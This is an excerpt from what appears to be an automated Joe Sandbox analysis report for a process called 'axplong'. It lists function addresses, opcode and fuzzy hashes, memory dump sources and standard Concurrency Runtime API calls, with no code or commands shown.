                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c45063f7d60957288c67d230bd78bd4b5e7e8cc332e3409ecb92ebe2d4b3420f
                                                                                                                                                                                                                                                    • Instruction ID: 7b15323c4e43579d86ce777ed7fb5af2e61a4d8481217d295a894e60a590f6ff
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c45063f7d60957288c67d230bd78bd4b5e7e8cc332e3409ecb92ebe2d4b3420f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E111B7EB34C114BE7541A1872E149F6BB6DE9C633233080B6F403D594AF2C46B5D7231
                                                                                                                                                                                                                                                    Function 04B301CE Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b9487c56d022f28f730ae6a7689e28aa5c3dcb030e7baf869a96f1a2c761101f
                                                                                                                                                                                                                                                    • Instruction ID: 9beb718a2aa520acc2631e50010f7b1d8db49aeb46bcb1d9e63b755b6e8df4e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9487c56d022f28f730ae6a7689e28aa5c3dcb030e7baf869a96f1a2c761101f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B02138A734D2547FA70295562E149FA7B6DE9C623233080BBF402C944BE2852A5DA332
                                                                                                                                                                                                                                                    Function 04B3021C Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 218818ec552e0cf09c0afff0f62607a7d36a99888e0a77b3da928925797c0f14
                                                                                                                                                                                                                                                    • Instruction ID: 2d1abb257bc9a0515fd294cfce02f057e0fbae913318157031dca0cc3f736cae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 218818ec552e0cf09c0afff0f62607a7d36a99888e0a77b3da928925797c0f14
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0011C4EB34C114BEB541A1436F14AFBB76DEAC673133080BAF403D554AE2D46A4E7271
                                                                                                                                                                                                                                                    Function 04B3026E Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: edfaa9ec8d518d8a2f2f9f3b66d4ade4a6df66a4baace382d2211e9fdbcc2661
                                                                                                                                                                                                                                                    • Instruction ID: e4ce26e5f35a22d2931ebbbae76bce65f57458bce6322553ba9d19bd49f39d2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edfaa9ec8d518d8a2f2f9f3b66d4ade4a6df66a4baace382d2211e9fdbcc2661
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A511E7BB34C1257EB641A1472F149FB776DE9C6331730807AF403C544AF2895A5D7671
                                                                                                                                                                                                                                                    Function 04B3023E Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 199d7bbce1eab5ee0f1d77d53189058281ed600af7ebc1ca93e62d64872ff83b
                                                                                                                                                                                                                                                    • Instruction ID: b640603089332bbbe702bce9905fe5270fc7ca8f4f61942dc44d5c3e3fd7f6ea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 199d7bbce1eab5ee0f1d77d53189058281ed600af7ebc1ca93e62d64872ff83b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211C6EB34C1147E7542A1832E049FB776DE9C6732330846AF403C554AE2985B5A7271
                                                                                                                                                                                                                                                    Function 04B30258 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8cbcddabefea408597929a403f0c2d19bf437ef6a40f6b588b2966f01083da83
                                                                                                                                                                                                                                                    • Instruction ID: 9488ed4ee922f278c475186b838d9dee3b1fce33b99908dd6928e96fda92a373
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cbcddabefea408597929a403f0c2d19bf437ef6a40f6b588b2966f01083da83
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901C4EB34C114BE7641A1872E04EFBB76DE9C6732330C47AF402C584AF2986A5E7271
                                                                                                                                                                                                                                                    Function 04B302A6 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7edeae069c2c447ef3b071e75abfd77e366e06d95455174fb743b0ae5aa6212e
                                                                                                                                                                                                                                                    • Instruction ID: d53a1661a2be63ad7bc3ed5f5260fa20fa2bf56f6c9bf82b8d479c2f78310b0c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7edeae069c2c447ef3b071e75abfd77e366e06d95455174fb743b0ae5aa6212e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA012CEB25C1207EB141A5476F14AFBA76DE4DA731330C57BF402C1446E2881A5E6635
                                                                                                                                                                                                                                                    Function 04B3029A Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7d120d6c2268165aa80635c347c01ec5d9050934378914d4a772778bb6042328
                                                                                                                                                                                                                                                    • Instruction ID: 17d99019e065519bd570eea80effda7f4287c17a683c6edbde1ae4bf5ed17cd6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d120d6c2268165aa80635c347c01ec5d9050934378914d4a772778bb6042328
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A014BEB24C1207E7541A1876F14AFBBB6DE5CA731330846BF402C084AE2991A4E7235
                                                                                                                                                                                                                                                    Function 04B302CA Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 84c3985ab150322a647ddad4be4c1a725db732370e3d1747e1fa569e15b81950
                                                                                                                                                                                                                                                    • Instruction ID: de50a1774f10e711faf83f2b049c14435bb3d517c7444d07f8d7605b8d90a834
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c3985ab150322a647ddad4be4c1a725db732370e3d1747e1fa569e15b81950
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0F9F724D2506FE24191966F21AFBBBADD6C6730330857BF442C6187D2890A8AA132
                                                                                                                                                                                                                                                    Function 04B302F1 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1c103928e78b41ca9449b91eb5c3e102d6f7304582f5cb59b5a26950a4461422
                                                                                                                                                                                                                                                    • Instruction ID: 7b901fd86aa61004b745cc29b674b256fc4940d53132adf72d665fb0f6ac65db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c103928e78b41ca9449b91eb5c3e102d6f7304582f5cb59b5a26950a4461422
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CF08CEB25D2107EB251904A7F14AF3ABAEE6DA330330C47BF402C158BE3891A5D6135

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00690D43 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00690E46
                                                                                                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00690E92
                                                                                                                                                                                                                                                      • Part of subcall function 0069258D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00692680
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00690EFE
                                                                                                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00690F1A
                                                                                                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00690F6E
                                                                                                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00690F9B
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00690FF1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                    • API String ID: 2943730970-3887548279
                                                                                                                                                                                                                                                    • Opcode ID: 32ca83d15da12a0082d6074f455a2108dc8f54ee9079bf8a7068cda543265e70
                                                                                                                                                                                                                                                    • Instruction ID: 35b5ccc8ec99160d06f0a565c3a2f34354d48573e7391e86ec5824ab3c41204c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32ca83d15da12a0082d6074f455a2108dc8f54ee9079bf8a7068cda543265e70
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8B16E70A01616AFDF28CF58D991B7AB7BAFF44300F24415EE906ABB41D730AD81CB94
                                                                                                                                                                                                                                                    Function 00691532 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00692C2C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00692C3F
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00691544
                                                                                                                                                                                                                                                      • Part of subcall function 00692D3F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00692D69
                                                                                                                                                                                                                                                      • Part of subcall function 00692D3F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00692DD8
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00691676
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006916D6
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006916E2
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 0069171D
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0069173E
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0069174A
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00691753
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0069176B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2508902052-0
                                                                                                                                                                                                                                                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                                    • Instruction ID: 881710a924e5bac94d486cf6fa6e1794503bbe0b50d87ce74007e1a5c840aea7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50814E71E006269FCF18DFA8C5809ADB7BAFF49304B2545ADD445ABB01C770ED42CB94
